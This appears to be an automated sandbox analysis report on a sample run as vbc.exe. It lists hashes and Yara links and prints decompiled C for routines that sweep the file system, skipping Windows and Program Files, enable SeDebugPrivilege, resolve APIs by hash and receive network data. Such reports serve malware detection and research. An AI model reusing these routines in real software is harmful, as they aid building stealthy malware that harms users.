Source File: 00000004.00000002.2170279976.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 008ac0cbfbd7096202cda685e198c6c3def5be88a1359366efcd61182f416f75
Instruction ID: 552226276dbe2fd2e4b131cb0d9d72de095505d09c30e0f5c00233a5070ab04f
Opcode Fuzzy Hash: 008ac0cbfbd7096202cda685e198c6c3def5be88a1359366efcd61182f416f75
Instruction Fuzzy Hash: 5CC02B2580D3842FC7010638544A3647F109702115F02038EC84404073CB108004CA01

Uniqueness

Uniqueness Score: -1.00%

Function 002E2040, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2170279976.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d200006d66dfcaf3ad5dd5c1c75a4ffe651a9ea33eed7fff1a75258716443a08
Instruction ID: 308734e347fe5fbfc39d01466d26648a0473cab39bdc6a53ba3d68073832f9aa
Opcode Fuzzy Hash: d200006d66dfcaf3ad5dd5c1c75a4ffe651a9ea33eed7fff1a75258716443a08
Instruction Fuzzy Hash: 93B01230240208CFC200DB5DD444C0033FCAF49A0434000D0F1098B731C721FC00CA40

Uniqueness

Uniqueness Score: -1.00%

Function 002E2080, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2170279976.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79a13f34584defdca235b799d1b828a2c8c31dd1e8bba79713e0f379b1fe5d5a
Instruction ID: 3500fcb77b3068117070a2755b6df40992440358c719d221bb354a181ae4356b
Opcode Fuzzy Hash: 79a13f34584defdca235b799d1b828a2c8c31dd1e8bba79713e0f379b1fe5d5a
Instruction Fuzzy Hash: 22B092311502088F83009B68E548C0137A8AB08A143110090E1088B232C621F8008A51

Uniqueness

Uniqueness Score: -1.00%

Function 002E1C12, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2170279976.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9af7ab99558d8530ffd6b174100f3b0556b359fe9de3439f788270016c5fb588
Instruction ID: 86951ae75bdf4083cf5f749ec759cb913ea688d995a6de08ab2f09e5f27a7f2a
Opcode Fuzzy Hash: 9af7ab99558d8530ffd6b174100f3b0556b359fe9de3439f788270016c5fb588
Instruction Fuzzy Hash: 5FB01296945488C4DB4215903F30F1429354B91215F5E81A7502C956F39506C86CC10C

Uniqueness

Uniqueness Score: -1.00%

Function 002E1C20, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2170279976.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32b6bda1a47f7b54a4657dddeeb15306cdfb4e3dc291920e9ce75f4b978d6cd1
Instruction ID: acc3ca15bb597c11aabb9955d70fe6316680e78dcd512a712f83353c8198d155
Opcode Fuzzy Hash: 32b6bda1a47f7b54a4657dddeeb15306cdfb4e3dc291920e9ce75f4b978d6cd1
Instruction Fuzzy Hash: 67900235044A0C8B464027A57C19959777CB7445157880153A50E429115A5664958595

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 002E555A, Relevance: 2.7, Strings: 2, Instructions: 178COMMON

Download Yara Rule

Strings

/r;=, xrefs: 002E4F76
y, xrefs: 002E5283

Memory Dump Source

Source File: 00000004.00000002.2170279976.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: /r;=$y
API String ID: 0-394429618
Opcode ID: 14153ada4dc45a9943e9a94420caaf3c6084ccc773f91cfda095ba0977562140
Instruction ID: 1433880848b82983376cbaa9fe68fa475daaafb04f1b3766c8b3b2eec9922dc6
Opcode Fuzzy Hash: 14153ada4dc45a9943e9a94420caaf3c6084ccc773f91cfda095ba0977562140
Instruction Fuzzy Hash: 049181B1E1262D8FDBA4DF29C985BC9BBF1BB48300F4181E9D24CE6244DB309A958F15

Uniqueness

Uniqueness Score: -1.00%

Function 002E4F60, Relevance: 2.7, Strings: 2, Instructions: 172COMMON

Download Yara Rule

Strings

/r;=, xrefs: 002E4F76
y, xrefs: 002E5283

Memory Dump Source

Source File: 00000004.00000002.2170279976.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: /r;=$y
API String ID: 0-394429618
Opcode ID: 14e5a199aa17c6b85bbaf883777a6425fbca40ee78ab0650204aca8e2570ac7e
Instruction ID: 7a0855a71d6eeeb0cd10aa289009658cebbf41cd30d53e1eed2393743504a1f5
Opcode Fuzzy Hash: 14e5a199aa17c6b85bbaf883777a6425fbca40ee78ab0650204aca8e2570ac7e
Instruction Fuzzy Hash: AD9183B1E1262D8FDBA4DF29D985BC9BBF1BF48300F4181E9D24CE6244DB309A958F15

Uniqueness

Uniqueness Score: -1.00%

Function 006148C4, Relevance: 1.5, Strings: 1, Instructions: 221COMMON

Download Yara Rule

Strings

/7~H, xrefs: 00614BA7

Memory Dump Source

Source File: 00000004.00000002.2170495826.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false

Similarity

API ID:
String ID: /7~H
API String ID: 0-831131323
Opcode ID: 91752db0608b3791d4c20909b78125b349f532a6ecd225324f623a9094469a39
Instruction ID: f9d927bada1c3bd306eb7d6849c5a0a657c9f6feb7a2b3b6f1bd0dcb8be96970
Opcode Fuzzy Hash: 91752db0608b3791d4c20909b78125b349f532a6ecd225324f623a9094469a39
Instruction Fuzzy Hash: 7B917E74E052598FCB14CFA9C980ADDBBB2FF8A304F24C1AAD449A7256DB305981CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00615CE0, Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

9@0[, xrefs: 00615DE0

Memory Dump Source

Source File: 00000004.00000002.2170495826.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false

Similarity

API ID:
String ID: 9@0[
API String ID: 0-4278344568
Opcode ID: d36b0f80643ad0bd789e24527a82bc414dc775b774ffb062b3922c8ccb86d775
Instruction ID: c6626060fd54718ad44535bb62d0f504525cea854bb2f92f951a8ebcce9e4f55
Opcode Fuzzy Hash: d36b0f80643ad0bd789e24527a82bc414dc775b774ffb062b3922c8ccb86d775
Instruction Fuzzy Hash: 66712670E0560ADFCB04CFE5D5845EEFBF2AF88310F28D426D516AB254D7349A828FA4

Uniqueness

Uniqueness Score: -1.00%

Function 002E2D80, Relevance: 1.4, Strings: 1, Instructions: 144COMMON

Download Yara Rule

Strings

@2Bm, xrefs: 002E2F7D

Memory Dump Source

Source File: 00000004.00000002.2170279976.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: @2Bm
API String ID: 0-1827899069
Opcode ID: 93d1acf5be918d8e5a14d5530aa5153526a29a1762b48e94e82a3ae02fcb5997
Instruction ID: c6d49b1b1b12a4d6987c94e9819b90e9ef664afd8bf20fc7e188ca0b92b84f40
Opcode Fuzzy Hash: 93d1acf5be918d8e5a14d5530aa5153526a29a1762b48e94e82a3ae02fcb5997
Instruction Fuzzy Hash: 33517D70910248CFCB45EFBAE880A9DBBF7AFC9308F50C939D0099B665DB7459858B91

Uniqueness

Uniqueness Score: -1.00%

Function 00610048, Relevance: 1.4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

Strings

n-lt, xrefs: 006100FD

Memory Dump Source

Source File: 00000004.00000002.2170495826.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false

Similarity

API ID:
String ID: n-lt
API String ID: 0-1409817361
Opcode ID: c39256d09096847e386965c172c08b1ba2bbd2de32f3224e021633dc226e3418
Instruction ID: 9ff3e993c34bd0cd47df68f39c6be91ef3429e40d51c832b19f53fc67d6b87c3
Opcode Fuzzy Hash: c39256d09096847e386965c172c08b1ba2bbd2de32f3224e021633dc226e3418
Instruction Fuzzy Hash: F341E570E1520ADFDF08CFAAC4815EEFBF2BB88311F24D46AD415A7254D3749A828F94

Uniqueness

Uniqueness Score: -1.00%

Function 00616650, Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

eF, xrefs: 00616688

Memory Dump Source

Source File: 00000004.00000002.2170495826.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false

Similarity

API ID:
String ID: eF
API String ID: 0-3337382328
Opcode ID: 107dcdb27c5814f1e3774129f05db958d45fc789242b1378426e5f591aa9f3a0
Instruction ID: 76dfc1f30bebebc6c437d4a341dc947007061a47c9f55c23cb25ac3a6ac69005
Opcode Fuzzy Hash: 107dcdb27c5814f1e3774129f05db958d45fc789242b1378426e5f591aa9f3a0
Instruction Fuzzy Hash: 9B31E132D0A3858FDB08CFB6C9155D9BBB3AFC7210F28C0ABD449AB253D6710946CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00613658, Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2170495826.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8596b0c06d1e93964c6692c8ad5f06d76489399b97024b1488ce8f1ebc057175
Instruction ID: 232e24d69e2e9abf9a45ef08f8f830a15991e3b15024762556a5b19d4e16b23f
Opcode Fuzzy Hash: 8596b0c06d1e93964c6692c8ad5f06d76489399b97024b1488ce8f1ebc057175
Instruction Fuzzy Hash: B2A14C2644E3C24FC7928BB48A6E1C5BF62AE0312977DC5CFD4C64E843E293819BD752

Uniqueness

Uniqueness Score: -1.00%

Function 00610270, Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2170495826.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57370e02943cfbae9bc6d59244757f25a6f67e00b6e02ffdadb6fc83fe1b3dfc
Instruction ID: 5372c8f73e49a7855ef8c58f221268f3b02842fb5befa6453c72344e10fd7f0e
Opcode Fuzzy Hash: 57370e02943cfbae9bc6d59244757f25a6f67e00b6e02ffdadb6fc83fe1b3dfc
Instruction Fuzzy Hash: 1F71E674E15209CFDF04CFA9C5849DEFBF2EF89310F28946AD415B7264D3749A828B64

Uniqueness

Uniqueness Score: -1.00%

Function 00610280, Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2170495826.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af6e90dbe2807bd48e4a3d12e55a4409e81612e8ceebdffe4621e21a71a157c1
Instruction ID: a01c79f32932d7fe9e20c663b219de6475966771a40a3bfddfe3f0df1b74d31f
Opcode Fuzzy Hash: af6e90dbe2807bd48e4a3d12e55a4409e81612e8ceebdffe4621e21a71a157c1
Instruction Fuzzy Hash: 6E71D574E15609CFDF04CFA9C5849DEFBF2EF89310F28946AD415B7224D3749A828B68

Uniqueness

Uniqueness Score: -1.00%

Function 002EED48, Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2170279976.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bb681cf9e3cf2e52324fcaa4da9b7229448ae75e352524571ae2967420e1ab9
Instruction ID: 2f62470d92810a191b8035435b09c60eaee178a4f64e8e53fc53036f93943e5d
Opcode Fuzzy Hash: 1bb681cf9e3cf2e52324fcaa4da9b7229448ae75e352524571ae2967420e1ab9
Instruction Fuzzy Hash: AE81D074A20259DFCB44CF9AC98499EFBF1FF88310F65855AD419AB324D370AA52CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002EF8D8, Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2170279976.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc22817909e1da30a4d77ba2aad0520ab7fcf76f6c66c00b1996a35772c10e12
Instruction ID: 9b53392f9e41fbbd9241c5fd14559a6bec41f3d8ee11143f0be0655acda9b7c5
Opcode Fuzzy Hash: cc22817909e1da30a4d77ba2aad0520ab7fcf76f6c66c00b1996a35772c10e12
Instruction Fuzzy Hash: 107104B4E2024ADFCB44CF9AD5809AEFBB1FF49310F64942AD419AB311D370A952CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00610538, Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2170495826.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a0531729ff811ee7f4c266f7a80cd27cd17478a9dd16bb960e0ab016a3d6dd8
Instruction ID: 4e2385f0621854464f800de4f2d3ae4e44cdb5d5262606b07fb7e40267ba0e01
Opcode Fuzzy Hash: 9a0531729ff811ee7f4c266f7a80cd27cd17478a9dd16bb960e0ab016a3d6dd8
Instruction Fuzzy Hash: D441D9B4E0524ACFDB04CFA9C5815EEFBF2AF89300F24D56AC405A7214D7749A928F94

Uniqueness

Uniqueness Score: -1.00%

Function 00610548, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2170495826.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81e3b34350aa0956655b45e79ffbbb7f0ba90037a359e0e28458b7dbbd21031a
Instruction ID: cc44d6c2c74c0b961250cb8539ca4f3768dbc10f2e5a646a44e0e9d5d0e96595
Opcode Fuzzy Hash: 81e3b34350aa0956655b45e79ffbbb7f0ba90037a359e0e28458b7dbbd21031a
Instruction Fuzzy Hash: 0A41C7B4E0520ADBDF48CFA9C5415EEFBF2BF88300F24D46AC415A7214D7749A928F94

Uniqueness

Uniqueness Score: -1.00%

Function 006112A8, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2170495826.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caf69c8252244ba6f7bbdd3f394f6edb622c00cee8eca32485e0b9d65b61aa5d
Instruction ID: ca22b1f8eb8f102ed0ac5c2bd36ac323fd4984b13855f1ac4437da47d504260d
Opcode Fuzzy Hash: caf69c8252244ba6f7bbdd3f394f6edb622c00cee8eca32485e0b9d65b61aa5d
Instruction Fuzzy Hash: E1415E75E016588BEB18CF6B8D4439EFAF3AFC9301F14C1BA850CA6255DB300A858E51

Uniqueness

Uniqueness Score: -1.00%

Function 002EAFB2, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2170279976.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c0c2305ae90463ba937cffb3c166c6438244b91dfee587465adf5751daf7fa
Instruction ID: 72687b2c932c25f53c83118225a8bdc1791a361f27b1824dd0e890995a01ac5c
Opcode Fuzzy Hash: 14c0c2305ae90463ba937cffb3c166c6438244b91dfee587465adf5751daf7fa
Instruction Fuzzy Hash: B8213E71E146488FEB19CF6B9C5069EFBF7AFC9200F08C07AC808A6264EB3415458F51

Uniqueness

Uniqueness Score: -1.00%

Function 00616080, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2170495826.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d585db298eec42ab8aad56150b4e4bddf4af8b4cff85c264efb821a6c317132
Instruction ID: ea3486808ba4d1a546fc9e5b6916ef6fdde15b618ee9e6e48375f256494d389a
Opcode Fuzzy Hash: 2d585db298eec42ab8aad56150b4e4bddf4af8b4cff85c264efb821a6c317132
Instruction Fuzzy Hash: 7E215971E116189BDB58CFAAD9416EEFBF3EFC9300F28C07AD408A7254EB305A458B51

Uniqueness

Uniqueness Score: -1.00%

Function 00610728, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2170495826.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f5bf704d4df212fb97676497608112c9a764b29bda8897a7689e52a121d3992
Instruction ID: 7cb349f1c837dcef0046dc72ee615d7c0559b74ec9e85a0b42f951cca52a158f
Opcode Fuzzy Hash: 7f5bf704d4df212fb97676497608112c9a764b29bda8897a7689e52a121d3992
Instruction Fuzzy Hash: A211CE71E006189BEB1CCFABD8406DEF7F7AFC8200F18C07AD508A6254EB7416858F55

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exe PID: 3052 Parent PID: 2856 vbc.exeCOMMON

Executed Functions

Function 00403D74, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				void* _t35;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t98 = E00405B6F(0, L"%s\\%s", _a4);
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}

0x00403d82
0x00403d88
0x00403d8c
0x00403d8d
0x00403d90
0x00403ea9
0x00403ea9
0x00403eb9
0x00403ebb
0x00403ec0
0x00403f95
0x00403f95
0x00000000
0x00403f95
0x00403ece
0x00403edb
0x00403edd
0x00403ee2
0x00403f8e
0x00403f8f
0x00000000
0x00403f94
0x00000000
0x00403ee8
0x00403ef8
0x00403f0a
0x00403f12
0x00403f18
0x00403f26
0x00403f28
0x00403f2d
0x00000000
0x00000000
0x00403f33
0x00403f76
0x00403f7c
0x00000000
0x00403f83
0x00403f36
0x00403f3a
0x00000000
0x00403f40
0x00403f0c
0x00403f10
0x00000000
0x00000000
0x00000000
0x00403f41
0x00403f41
0x00403f4b
0x00403f58
0x00403f5c
0x00403f88
0x00000000
0x00403f8d
0x00403f60
0x00000000
0x00403f60
0x00403ef8
0x00403ee8
0x00403da3
0x00403da9
0x00403ea6
0x00403ea8
0x00000000
0x00403ea8
0x00403db7
0x00403dc4
0x00403dc6
0x00403dcb
0x00403e9d
0x00403e9e
0x00403ea4
0x00000000
0x00000000
0x00000000
0x00000000
0x00403dd1
0x00403dd1
0x00403dd8
0x00000000
0x00000000
0x00403de2
0x00403e12
0x00403e22
0x00403e30
0x00403e36
0x00403e3f
0x00403e44
0x00403e47
0x00403e4a
0x00403e4c
0x00000000
0x00000000
0x00403e63
0x00403e65
0x00403e6a
0x00403e6f
0x00403f64
0x00403f6a
0x00000000
0x00403f71
0x00000000
0x00403e6f
0x00403e26
0x00403e27
0x00403e2e
0x00000000
0x00000000
0x00000000
0x00403e2e
0x00403dea
0x00403df9
0x00000000
0x00000000
0x00403e01
0x00403e10
0x00000000
0x00000000
0x00000000
0x00403e75
0x00403e7f
0x00403e8c
0x00403e8e
0x00403e97
0x00000000

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

Windows, xrefs: 00403DEA
%s\*, xrefs: 00403D99
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C
Program Files, xrefs: 00403E01

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 63e1f370609dfed3717ff2c0158d5115428f49d0583d80af2640003a87fa6112
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 63e1f370609dfed3717ff2c0158d5115428f49d0583d80af2640003a87fa6112
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Uniqueness

Uniqueness Score: -1.00%

Function 0040650A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}

0x00406512
0x00406514
0x00406522
0x00406524
0x00406530
0x00406534
0x0040653f
0x0040654e
0x00406552
0x0040655a
0x0040655f
0x0040656d
0x00406570
0x00406573
0x0040657a
0x00406589
0x0040658d
0x00406590
0x00406594
0x00000000
0x0040659a
0x004065a1

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Uniqueness

Uniqueness Score: -1.00%

Function 00402B7C, Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}

0x00402b8c
0x00402b92
0x00402b96
0x00402b9e
0x00402ba3
0x00402baa

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Uniqueness

Uniqueness Score: -1.00%

Function 00406069, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}

0x00406077
0x00406082
0x00406085

APIs

GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED4, Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
